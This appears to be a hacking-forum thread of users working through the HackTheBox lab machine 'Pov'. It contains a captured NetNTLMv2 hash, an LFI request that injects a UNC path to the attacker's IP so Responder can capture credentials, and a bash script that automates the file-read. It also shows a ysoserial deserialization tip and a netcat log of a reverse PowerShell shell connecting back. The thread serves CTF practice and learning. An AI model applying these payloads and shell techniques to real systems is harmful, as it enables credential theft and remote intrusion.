Posts: 11
Threads: 0
Joined: Jan 2024
(Jan 27, 2024, 07:24 PM)DataNinja Wrote: (Jan 27, 2024, 07:21 PM)peRd1 Wrote: (Jan 27, 2024, 07:17 PM)DataNinja Wrote: sfitz::POV:8ddcbc4990a229f2:6D61CA53E260337B7D2CE94D5857661E:010100000000000080696D5E3B51DA01C628A205F38E43000000000002000800370051004D004A0001001E00570049004E002D004100530050005A00430042003200320044004600310004003400570049004E002D004100530050005A0043004200320032004400460031002E00370051004D004A002E004C004F00430041004C0003001400370051004D004A002E004C004F00430041004C0005001400370051004D004A002E004C004F00430041004C000700080080696D5E3B51DA01060004000200000008003000300000000000000000000000002000000ECFC910753DDB10DA51F67C7FD3A5F365A5F56BCC4471437D6197230E85E1E40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370038000000000000000000
nice1 how?
LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
I'm not able to intercept the hash using responder on the LFI, can you please provide a bit more. Thanks in advance!
Posts: 17
Threads: 1
Joined: Aug 2023
(Jan 27, 2024, 07:48 PM)nonimon Wrote: (Jan 27, 2024, 07:24 PM)DataNinja Wrote: (Jan 27, 2024, 07:21 PM)peRd1 Wrote: (Jan 27, 2024, 07:17 PM)DataNinja Wrote: sfitz::POV:8ddcbc4990a229f2:6D61CA53E260337B7D2CE94D5857661E:010100000000000080696D5E3B51DA01C628A205F38E43000000000002000800370051004D004A0001001E00570049004E002D004100530050005A00430042003200320044004600310004003400570049004E002D004100530050005A0043004200320032004400460031002E00370051004D004A002E004C004F00430041004C0003001400370051004D004A002E004C004F00430041004C0005001400370051004D004A002E004C004F00430041004C000700080080696D5E3B51DA01060004000200000008003000300000000000000000000000002000000ECFC910753DDB10DA51F67C7FD3A5F365A5F56BCC4471437D6197230E85E1E40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370038000000000000000000
nice1 how?
LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
I'm not able to intercept the hash using responder on the LFI, can you please provide a bit more. Thanks in advance!
Activate responder on you machine and put your own address in the file field.
Posts: 98
Threads: 3
Joined: Oct 2023
is anyone able to pull any files, other than index.aspx.cs ?
Posts: 14
Threads: 0
Joined: Jan 2024
(Jan 27, 2024, 07:24 PM)DataNinja Wrote: (Jan 27, 2024, 07:21 PM)peRd1 Wrote: (Jan 27, 2024, 07:17 PM)DataNinja Wrote: sfitz::POV:8ddcbc4990a229f2:6D61CA53E260337B7D2CE94D5857661E:010100000000000080696D5E3B51DA01C628A205F38E43000000000002000800370051004D004A0001001E00570049004E002D004100530050005A00430042003200320044004600310004003400570049004E002D004100530050005A0043004200320032004400460031002E00370051004D004A002E004C004F00430041004C0003001400370051004D004A002E004C004F00430041004C0005001400370051004D004A002E004C004F00430041004C000700080080696D5E3B51DA01060004000200000008003000300000000000000000000000002000000ECFC910753DDB10DA51F67C7FD3A5F365A5F56BCC4471437D6197230E85E1E40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370038000000000000000000
nice1 how?
LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
(Jan 27, 2024, 08:31 PM)VfV Wrote: (Jan 27, 2024, 08:20 PM)n3wdefender Wrote: (Jan 27, 2024, 08:19 PM)VfV Wrote: (Jan 27, 2024, 07:48 PM)nonimon Wrote: (Jan 27, 2024, 07:24 PM)DataNinja Wrote: LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
I'm not able to intercept the hash using responder on the LFI, can you please provide a bit more. Thanks in advance!
me neither
this may help you.
https://medium.com/@ucihamadara/responde...86dad57990
I did
sudo responder -I tun0
And then intercepted on the CV download and put my IP in the "file=" parameter, still getting nothing back
tried 10.10.XX.XX Just put ur ip with \\10.10.XX.XX\
Posts: 6
Threads: 0
Joined: Jan 2024
(Jan 27, 2024, 08:31 PM)VfV Wrote: (Jan 27, 2024, 08:20 PM)n3wdefender Wrote: (Jan 27, 2024, 08:19 PM)VfV Wrote: (Jan 27, 2024, 07:48 PM)nonimon Wrote: (Jan 27, 2024, 07:24 PM)DataNinja Wrote: LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
I'm not able to intercept the hash using responder on the LFI, can you please provide a bit more. Thanks in advance!
me neither
this may help you.
https://medium.com/@ucihamadara/responde...86dad57990
I did
sudo responder -I tun0
And then intercepted on the CV download and put my IP in the "file=" parameter, still getting nothing back
tried 10.10.XX.XX
POST /portfolio/ HTTP/1.1
Host: dev.pov.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: http://dev.pov.htb
Connection: keep-alive
Referer: http://dev.pov.htb/portfolio/
Upgrade-Insecure-Requests: 1
Content-Length: 393
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=IF5kZJZ1ideGBDPROTQn3RAv7WlW3XRx0S3DSS2QJ6zR1e8YmJx2aOqs9s9fPXz3uFFYB%2Fvq9cVaLek9aTVSYdbSfl4%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=%2BsWUbioJAgHmeHve39BzlYT0Pg13d6FcH1LdNKH2goFApjy8zB6dl%2Fk1yQe5iifNwPGY%2BfYkn%2BgJsL5BJhmK%2Ft%2F%2BwU%2B6iQ%2BPVhgmlhilfD3tb0JjaRfSsCQYXHjmQmqI0E3y4Q%3D%3D&file=%5C%5C10.10.14.26%5Cdefault.aspx
where %5C%5C10.10.14.26%5Cdefault.aspx == \\10.10.14.26\default.aspx ...
Posts: 55
Threads: 2
Joined: Jul 2023
to automate the lfi
#!/bin/bash
lfi() {
local path="$1"
local url="http://dev.pov.htb/portfolio/"
local data="__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=oZdOFgVMnMUK%2FYsKb5EIbu8K5FHpcUxxiZo4DRwjqKXyaBZlr5C2B1qTDis2i3ay5jRdEkHIpxK%2FDtizrUyeFYsgG2I%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=q9%2BtrU8Llel1HIV8dNCMQjWweRAVxWvJLVMAhov2wealiJz5v86vse9faPve%2B2Ujm%2BGxnHiSCVy56Gzrmw%2BEzjrEGa%2BQ6qlezJahDpD%2BDppQ%2BivmcgEiaonMs2JLzDyETmEABw%3D%3D&file=$path"
#echo -e $data
if response=$(curl -s -k -X POST --data-binary "$data" "$url"); then
if [ "$(echo "$response" | grep -c "Error 404: Not Found")" -eq 0 ]; then
echo -e "\e[32m$response\e[0m"
else
echo -e "\e[31m$path not found.\e[0m"
fi
else
echo -e "\e[31mLFI Error : $(curl -s "$url" --data-urlencode "$params" -o /dev/null -w '%{http_code}')\e[0m"
fi
}
main() {
while true; do
read -r -p $'\e[34m[+] file >> \e[0m' path
lfi "$path"
done
}
if [ "${BASH_SOURCE[0]}" == "${0}" ]; then
main
fi
Posts: 45
Threads: 1
Joined: Jan 2024
anyone cracked the hash yet?
Posts: 9
Threads: 0
Joined: Jan 2024
(Jan 27, 2024, 07:42 PM)peRd1 Wrote: LFI on cv download endpoint...
Complete newb here, would you be willing to explain this a bit more ?
Appreciate it.
Posts: 134
Threads: 13
Joined: Sep 2023
ysoserial after you grab webconfig will get you foothold
Posts: 12
Threads: 0
Joined: Aug 2023
nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.58] from (UNKNOWN) [10.129.125.228] 49674
Windows PowerShell running as user POV$ on POV
Copyright © 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
pov\sfitz
PS C:\windows\system32\inetsrv> hostname
pov
PS C:\windows\system32\inetsrv>
|
